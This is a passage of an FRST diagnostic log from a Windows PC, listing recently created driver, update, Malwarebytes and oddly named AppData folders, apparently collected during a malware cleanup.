2017-08-04 22:52 - 2017-08-04 22:52 - 000000664 _____ C:\Users\***\Documents\Minion.lnk
2017-08-04 22:52 - 2017-08-04 22:52 - 000000000 ____D C:\Users\***\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Good Game Mods LLC
2017-08-01 15:04 - 2017-08-06 01:24 - 000092298 _____ C:\Users\***\Desktop\Addition.txt
2017-08-01 15:01 - 2017-08-09 18:59 - 000021213 _____ C:\Users\***\Desktop\FRST.txt
2017-08-01 12:17 - 2017-08-07 23:52 - 000000000 ____D C:\ProgramData\Malwarebytes' Anti-Malware (portable)
2017-08-01 12:17 - 2017-08-07 19:45 - 000192216 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\MBAMSwissArmy.sys
2017-08-01 12:17 - 2017-08-01 12:32 - 000000000 ____D C:\Users\***\AppData\Local\Nybgy
2017-08-01 12:17 - 2017-08-01 12:17 - 000000000 ____D C:\ProgramData\Malwarebytes
2017-08-01 12:15 - 2017-08-07 19:45 - 000109272 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbamchameleon.sys
2017-08-01 12:14 - 2017-08-07 19:55 - 000000000 ____D C:\Users\***\Desktop\mbar
2017-08-01 12:06 - 2017-08-01 12:06 - 016563352 _____ (Malwarebytes Corp.) C:\Users\***\Desktop\mbar-1.09.3.1001.exe
2017-08-01 03:41 - 2017-08-01 04:04 - 000000000 ____D C:\ProgramData\TEMP
2017-08-01 02:24 - 2017-08-01 02:24 - 000000214 _____ C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job
2017-08-01 02:04 - 2017-08-01 03:19 - 000000000 ____D C:\Users\***\AppData\LocalLow\Mozilla
2017-08-01 02:04 - 2017-08-01 03:14 - 000000000 ____D C:\Users\***\AppData\Local\Mozilla
2017-08-01 01:54 - 2017-08-08 17:26 - 000002226 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2017-08-01 01:54 - 2017-08-08 17:26 - 000002214 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2017-08-01 01:54 - 2017-08-01 01:54 - 000003628 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA
2017-08-01 01:54 - 2017-08-01 01:54 - 000003504 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore
2017-07-31 20:21 - 2017-07-31 20:21 - 000000000 ____D C:\Users\***\AppData\Local\PDF24
2017-07-28 19:41 - 2017-07-19 00:38 - 000135800 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvStreaming.exe
2017-07-28 19:41 - 2017-03-10 23:17 - 000536864 _____ C:\WINDOWS\system32\vulkan-1.dll
2017-07-28 19:41 - 2017-03-10 23:17 - 000525600 _____ C:\WINDOWS\SysWOW64\vulkan-1.dll
2017-07-28 19:41 - 2017-03-10 23:17 - 000254240 _____ C:\WINDOWS\system32\vulkaninfo.exe
2017-07-28 19:41 - 2017-03-10 23:17 - 000233760 _____ C:\WINDOWS\SysWOW64\vulkaninfo.exe
2017-07-28 19:39 - 2017-07-19 02:40 - 040239736 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 035844728 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvoglv64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 035314296 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 028960376 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvoglv32.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 013655672 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuda.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 012451424 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvopencl.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 012133112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvptxJitCompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 011591576 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuda.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 010487760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvopencl.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 009982968 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvptxJitCompiler.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 004210032 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvapi64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 004163520 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvcuvid.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 003711328 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvapi.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 003595896 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvcuvid.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001988216 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispco6438494.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001598072 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvdispgenco6438494.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001278528 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFTH264.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001276992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncMFThevc.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001068152 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvFBC64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 001004992 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvFBC.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000996760 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFTH264.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000995408 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncMFThevc.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000972920 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFR64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000924280 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFR.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000781544 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvEncodeAPI64.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000725112 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvDecMFTMjpeg.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000689992 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvfatbinaryLoader.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000618744 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvmcumd.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000617416 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvEncodeAPI.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000609912 _____ (NVIDIA Corporation) C:\WINDOWS\system32\NvIFROpenGL.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000584312 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvDecMFTMjpeg.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000578056 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvfatbinaryLoader.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000499136 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\NvIFROpenGL.dll
2017-07-28 19:39 - 2017-07-19 02:40 - 000057792 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvhci.sys
2017-07-28 19:39 - 2017-07-19 02:40 - 000046463 _____ C:\WINDOWS\system32\nvinfo.pb
2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\SysWOW64\nv-vk32.json
2017-07-28 19:39 - 2017-07-19 02:40 - 000000669 _____ C:\WINDOWS\system32\nv-vk64.json
2017-07-28 18:14 - 2017-07-28 18:14 - 000004308 _____ C:\WINDOWS\System32\Tasks\NvDriverUpdateCheckDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-28 18:14 - 000004000 _____ C:\WINDOWS\System32\Tasks\NVIDIA GeForce Experience SelfUpdate_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-28 18:14 - 000003994 _____ C:\WINDOWS\System32\Tasks\NvNodeLauncher_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:14 - 2017-07-26 19:09 - 001922496 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvspcap64.dll
2017-07-28 18:14 - 2017-07-26 19:09 - 001505728 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvspcap.dll
2017-07-28 18:13 - 2017-07-28 18:13 - 000003894 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterDaily_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003866 _____ C:\WINDOWS\System32\Tasks\NvTmRep_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003858 _____ C:\WINDOWS\System32\Tasks\NvTmMon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003696 _____ C:\WINDOWS\System32\Tasks\NvTmRepOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-28 18:13 - 000003654 _____ C:\WINDOWS\System32\Tasks\NvProfileUpdaterOnLogon_{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}
2017-07-28 18:13 - 2017-07-26 19:09 - 000048064 _____ (NVIDIA Corporation) C:\WINDOWS\system32\Drivers\nvvad64v.sys
2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\***\AppData\Local\Usidikujp
2017-07-26 21:16 - 2017-08-01 04:05 - 000000000 ____D C:\Users\***\AppData\Local\Rvurcez
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\***\AppData\Local\Yhwopc
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\***\AppData\Local\Wqy He
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\***\AppData\Local\Bizpiwcinu
2017-07-26 21:16 - 2017-07-26 21:16 - 000000000 ____D C:\Users\***\AppData\Local\Bgew
2017-07-24 19:44 - 2017-07-26 19:09 - 000179136 _____ (NVIDIA Corporation) C:\WINDOWS\system32\nvaudcap64v.dll
2017-07-24 19:44 - 2017-07-26 19:09 - 000146368 _____ (NVIDIA Corporation) C:\WINDOWS\SysWOW64\nvaudcap32v.dll
2017-07-16 11:47 - 2017-07-16 11:47 - 001804696 _____ (Microsoft Corporation) C:\WINDOWS\system32\WdfCoInstaller01011.dll
2017-07-16 11:47 - 2017-07-16 11:47 - 000032840 _____ (ELAN Microelectronic Corp.) C:\WINDOWS\system32\Drivers\ETDSMBus.sys
2017-07-15 22:59 - 2017-07-15 22:59 - 000000000 ____D C:\Users\***\AppData\LocalLow\Thunder Lotus Games
2017-07-15 22:51 - 2017-07-15 22:51 - 000001418 _____ C:\Users\Public\Desktop\Darkest Dungeon.lnk
2017-07-11 20:54 - 2017-07-07 16:00 - 000947712 _____ (Microsoft Corporation) C:\WINDOWS\system32\HoloSI.PCShell.dll
2017-07-11 20:54 - 2017-07-07 09:24 - 000117664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\pdc.sys
2017-07-11 20:54 - 2017-07-07 09:21 - 032688336 _____ (Microsoft Corporation) C:\WINDOWS\system32\WindowsCodecsRaw.dll
2017-07-11 20:54 - 2017-07-07 09:20 - 002021680 _____ (Microsoft Corporation) C:\WINDOWS\system32\wmpmde.dll
2017-07-11 20:54 - 2017-07-07 09:20 - 000519584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\netio.sys
2017-07-11 20:54 - 2017-07-07 09:13 - 000336320 _____ (Microsoft Corporation) C:\WINDOWS\system32\SecurityHealthService.exe
2017-07-11 20:54 - 2017-07-07 09:11 - 000094624 _____ (Microsoft Corporation) C:\WINDOWS\system32\rdpudd.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 001670496 _____ (Microsoft Corporation) C:\WINDOWS\system32\winmde.dll
2017-07-11 20:54 - 2017-07-07 09:10 - 000254168 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2017-07-11 20:54 - 2017-07-07 09:07 - 001106848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\http.sys
2017-07-11 20:54 - 2017-07-07 09:07 - 000058488 _____ (Microsoft Corporation) C:\WINDOWS\system32\lsass.exe
2017-07-11 20:54 - 2017-07-07 08:57 - 000626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-07-11 20:54 - 2017-07-07 08:57 - 000125344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmapi.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 031652264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsRaw.dll
2017-07-11 20:54 - 2017-07-07 08:37 - 001339352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wmpmde.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 001518088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecs.dll
2017-07-11 20:54 - 2017-07-07 08:31 - 000129184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32.dll
2017-07-11 20:54 - 2017-07-07 08:30 - 000949920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dcomp.dll
2017-07-11 20:54 - 2017-07-07 08:29 - 000123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Clipc.dll
2017-07-11 20:54 - 2017-07-07 08:27 - 000557568 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieui.dll
2017-07-11 20:54 - 2017-07-07 08:26 - 001529384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\winmde.dll
2017-07-11 20:54 - 2017-07-07 08:25 - 000035232 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininitext.dll
2017-07-11 20:54 - 2017-07-07 08:20 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\system32\prntvpt.dll
2017-07-11 20:54 - 2017-07-07 08:19 - 007149056 _____ (Microsoft Corporation) C:\WINDOWS\system32\mos.dll
2017-07-11 20:54 - 2017-07-07 08:18 - 000548864 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorService.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000588800 _____ (Microsoft Corporation) C:\WINDOWS\system32\vbscript.dll
2017-07-11 20:54 - 2017-07-07 08:17 - 000422400 _____ (Microsoft Corporation) C:\WINDOWS\system32\WpAXHolder.dll
2017-07-11 20:54 - 2017-07-07 08:16 - 000545792 _____ (Microsoft Corporation) C:\WINDOWS\system32\winspool.drv
2017-07-11 20:54 - 2017-07-07 08:14 - 008211968 _____ (Microsoft Corporation) C:\WINDOWS\system32\mstscax.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 003784704 _____ (Microsoft Corporation) C:\WINDOWS\system32\MapRouter.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 001448960 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\GdiPlus.dll
2017-07-11 20:54 - 2017-07-07 08:14 - 000570880 _____ (Microsoft Corporation) C:\WINDOWS\system32\PhotoScreensaver.scr
2017-07-11 20:54 - 2017-07-07 08:12 - 001142272 _____ (Microsoft Corporation) C:\WINDOWS\system32\localspl.dll
2017-07-11 20:54 - 2017-07-07 08:12 - 000706560 _____ (Microsoft Corporation) C:\WINDOWS\system32\winlogon.exe
2017-07-11 20:54 - 2017-07-07 08:11 - 001812480 _____ (Microsoft Corporation) C:\WINDOWS\system32\msxml3.dll
2017-07-11 20:54 - 2017-07-07 08:10 - 000025088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\eapprovp.dll
2017-07-11 20:54 - 2017-07-07 08:09 - 000365056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\daxexec.dll
2017-07-11 20:54 - 2017-07-07 08:08 - 000285696 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mrxsmb10.sys
2017-07-11 20:54 - 2017-07-07 08:07 - 000272896 _____ (Microsoft Corporation) C:\WINDOWS\system32\PlayToReceiver.dll
2017-07-11 20:54 - 2017-07-07 08:07 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\raschap.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000412160 _____ (Microsoft Corporation) C:\WINDOWS\system32\SensorsApi.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000241152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WindowsCodecsExt.dll
2017-07-11 20:54 - 2017-07-07 08:06 - 000205824 _____ (Microsoft Corporation) C:\WINDOWS\system32\sensrsvc.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 000502784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DevicePairing.dll
2017-07-11 20:54 - 2017-07-07 08:05 - 000312320 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Wldap32.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000754176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\kerberos.dll
2017-07-11 20:54 - 2017-07-07 08:04 - 000506368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\vbscript.dll
2017-07-11 20:54 - 2017-07-07 08:03 - 006123520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mos.dll
2017-07-11 20:54 - 2017-07-07 08:02 - 000508416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PhotoScreensaver.scr
2017-07-11 20:54 - 2017-07-07 08:01 - 002859520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wininet.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 007596544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mstscax.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 002588160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MapRouter.dll
2017-07-11 20:54 - 2017-07-07 08:00 - 001565184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxml3.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 001494016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ActiveSyncProvider.dll
2017-07-11 20:54 - 2017-07-07 07:59 - 001355264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OpcServices.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 002782720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msftedit.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 002298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-07-11 20:54 - 2017-07-07 07:58 - 001237504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.Maps.dll
2017-07-11 20:54 - 2017-07-07 07:55 - 000342528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMPhoto.dll
2017-07-11 20:54 - 2017-07-07 07:55 - 000329216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SensorsApi.dll
2017-07-11 20:54 - 2017-07-07 07:53 - 001301504 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wdc.dll
2017-07-11 20:54 - 2017-07-07 07:53 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msinfo32.exe
2017-07-11 20:54 - 2017-06-20 08:11 - 000411992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MSAudDecMFT.dll
2017-07-11 20:54 - 2017-06-20 08:08 - 001242528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ndis.sys
2017-07-11 20:54 - 2017-06-20 08:02 - 001055648 _____ (Microsoft Corporation) C:\WINDOWS\system32\LicenseManager.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 001220072 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsvr.dll
2017-07-11 20:54 - 2017-06-20 07:59 - 000467504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFCaptureEngine.dll
2017-07-11 20:54 - 2017-06-20 07:34 - 000192416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aepic.dll
2017-07-11 20:54 - 2017-06-20 07:15 - 000455104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MSAudDecMFT.dll
2017-07-11 20:54 - 2017-06-20 07:13 - 000787712 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\rpcrt4.dll
2017-07-11 20:54 - 2017-06-20 07:13 - 000056832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModelOOBE.exe
2017-07-11 20:54 - 2017-06-20 07:12 - 000293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-07-11 20:54 - 2017-06-20 07:12 - 000086528 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\hdaudbus.sys
2017-07-11 20:54 - 2017-06-20 07:11 - 000084992 _____ (Microsoft Corporation) C:\WINDOWS\system32\MshtmlDac.dll
2017-07-11 20:54 - 2017-06-20 07:10 - 000722432 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-07-11 20:54 - 2017-06-20 07:10 - 000096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtmled.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000551424 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Payments.dll
2017-07-11 20:54 - 2017-06-20 07:09 - 000357888 _____ (Microsoft Corporation) C:\WINDOWS\system32\Narrator.exe
2017-07-11 20:54 - 2017-06-20 07:09 - 000140288 _____ (Microsoft Corporation) C:\WINDOWS\system32\iepeers.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 004469840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2017-07-11 20:54 - 2017-06-20 07:08 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\system32\LockHostingFramework.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000386560 _____ (Microsoft Corporation) C:\WINDOWS\system32\iedkcs32.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000328704 _____ (Microsoft Corporation) C:\WINDOWS\system32\PsmServiceExtHost.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000327168 _____ (Microsoft Corporation) C:\WINDOWS\system32\WinBioDataModel.dll
2017-07-11 20:54 - 2017-06-20 07:08 - 000274944 _____ (Microsoft Corporation) C:\WINDOWS\system32\dxtrans.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 002475136 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000823296 _____ (Microsoft Corporation) C:\WINDOWS\system32\MbaeApi.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000632832 _____ (Microsoft Corporation) C:\WINDOWS\system32\tileobjserver.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000510976 _____ (Microsoft Corporation) C:\WINDOWS\system32\TDLMigration.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000346016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostCommon.dll
2017-07-11 20:54 - 2017-06-20 07:07 - 000138656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CloudExperienceHostUser.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000754592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\LicenseManager.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000751104 _____ (Microsoft Corporation) C:\WINDOWS\system32\msfeeds.dll
2017-07-11 20:54 - 2017-06-20 07:06 - 000278944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\thumbcache.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000438096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.ApplicationModel.dll
2017-07-11 20:54 - 2017-06-20 07:05 - 000364032 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchProtocolHost.exe
2017-07-11 20:54 - 2017-06-20 07:04 - 002330520 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\combase.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001178528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxPackaging.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001177600 _____ (Microsoft Corporation) C:\WINDOWS\system32\Unistore.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 001077496 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webservices.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 000181656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AppxAllUserStore.dll
2017-07-11 20:54 - 2017-06-20 07:04 - 000049656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msasn1.dll
2017-07-11 20:54 - 2017-06-20 07:03 - 002077184 _____ (Microsoft Corporation) C:\WINDOWS\system32\inetcpl.cpl
2017-07-11 20:54 - 2017-06-20 07:03 - 000443728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFCaptureEngine.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 001121928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsvr.dll
2017-07-11 20:54 - 2017-06-20 07:02 - 000354400 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MMDevAPI.dll
2017-07-11 20:54 - 2017-06-20 07:00 - 002597888 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-07-11 20:54 - 2017-06-20 06:59 - 001674240 _____ (Microsoft Corporation) C:\WINDOWS\system32\wpncore.dll
2017-07-11 20:54 - 2017-06-20 06:56 - 000985600 _____ (Microsoft Corporation) C:\WINDOWS\system32\TSWorkspace.dll
2017-07-11 20:54 - 2017-06-20 06:49 - 000899072 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msctfuimanager.dll
2017-07-11 20:54 - 2017-06-20 06:49 - 000331776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\oleacc.dll
2017-07-11 20:54 - 2017-06-20 06:46 - 000132096 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Microsoft.Bluetooth.Profiles.Gatt.Interface.dll
2017-07-11 20:54 - 2017-06-20 06:45 - 000111104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.System.Profile.RetailInfo.dll
2017-07-11 20:54 - 2017-06-20 06:45 - 000064000 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MshtmlDac.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000329728 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000173568 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ClipboardServer.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000151552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wincredui.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000124928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iepeers.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000080384 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtmled.dll
2017-07-11 20:54 - 2017-06-20 06:43 - 000052224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dataclen.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000641024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certca.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000387584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Payments.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000338432 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iedkcs32.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000266240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dxtrans.dll
2017-07-11 20:54 - 2017-06-20 06:42 - 000121856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\sendmail.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000734208 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\bcastdvr.exe
2017-07-11 20:54 - 2017-06-20 06:41 - 000646656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MbaeApi.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000601088 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SndVolSSO.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000433152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Internal.Bluetooth.dll
2017-07-11 20:54 - 2017-06-20 06:41 - 000201216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\credprovhost.dll
2017-07-11 20:54 - 2017-06-20 06:40 - 000342016 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\certcli.dll
